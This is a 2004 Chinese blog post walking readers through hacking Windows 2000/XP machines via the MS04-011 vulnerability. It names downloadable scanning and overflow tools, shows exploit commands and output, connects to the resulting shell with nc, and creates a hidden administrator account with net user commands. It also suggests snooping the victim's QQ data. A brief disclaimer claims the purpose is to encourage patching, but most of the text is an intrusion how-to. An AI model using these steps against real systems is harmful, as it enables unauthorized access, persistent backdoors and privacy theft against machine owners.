CSDN博客

img carbon107

Ms04011漏洞

发表于2004/7/6 21:29:00  4411人阅读

分类: 漏洞

呵呵,大家都应知道这个漏洞吧,哈哈,它好厉害哦。HACKER们利用它来可以得到操作系统的administrators权限,得到系统的shell。不多说别的,看看他们都是入何入侵别人的机器吧。

 

1.  首先,去下载ms04011漏洞溢出的工具,网上有好多哦。

工具中包括了DSScan GetOS, MS04011溢出工具

DSScan:这个工具是用来扫描系统是否有MS04011漏洞的工具,当扫描到目标机器就此漏洞,便会列出它的ip地址,主机名, netbios名称,  还有最重要的就是状态信息. 它可以扫描到在此ip断内所有存活的主机,如果有MS04011漏洞的机器,在状态信息就列出vulnerable,否则为not vulnerable。一般一次扫描64ip地址。

GetOS:其是用来获得操作系统的类型,但必须对方机的139端口开放.

MS04011:其就是用来溢出的工具了.

2.如何溢出

首先用DSScan,在IP断内输入IP, 然后点那个右键头,使其进入右边的框内,可以多选

然后点击开始就可以.例如,我们扫到一个机器的结果为这样

Ip                      hostname           netbios              status

192.168.1.33       You                You                vulnerable

192.168.1.34       haha               haha                not vulnerable

大家可以看到192.168.1.33的机器statusvulnerable,这就说明它存在这ms04011的漏洞。

下面就让我们去溢出它吧,在开始溢出前先要得到对方机器的类型。用Getos来得到

在运行用输入cmd,回车,然后到你的程序路径下,输入getos 192.168.1.33

结果就会出现

[*] Connecting Port 139…..

[*] Sending session request…..

[*] Sending negotiation request….

[*] Sending setup account request….

[*] Successful…….

Remote OS:

-------------

WORKGROUP   这是工作组名

Windows 2000 LAN Manger  

Windows 5.0     这就是操作系统的类型,如果为windows 5.1那么就是xp

好了,我们知道它的类型是2000了,那么我们就马上用 ms04011来溢出吧

先打开两个cmd窗口, 在两个里面同时输入ms04011 0 192.168.1.33 然后一个一个的回车

在一个cmd里会出现

Shellcode size 404

Ret value = 1726  //注意1726才是溢出成功的代码

对于xp系统要用    Ms04011 1 192.168.1.33

3.如何得到机器的shell

要用到最厉害的瑞士军刀了(名称是NC), 哈哈,这个工具可不一般啊,到网上下载吧

然后在cmd内输入nc 192.168.1.33 1234 1234是溢出的端口号.哈哈是不是出现了这样的提示

C:/winnt/system32>

//哈哈,你成功了。你可以对其操作了

 

比如:

Net user haha 123 /add        //在对方机器可以建立名为haha, 密码为123 的用户

Net localgroup administrators haha /add  //使haha列入administrators.

 

当然可以到应用程序的tencent目录里看看MMQQ号啊,以后常联系哦。

 

 

严重声明:不可以利用此方法做非法行为,如发现本人不负任何责任。发表此文的目的在于使大家重视自已系统的安全,常打补丁。在国内有好多的机器存在这样的漏洞,唉!!!!!

 

0 0

相关博文

我的热门文章

img
取 消
img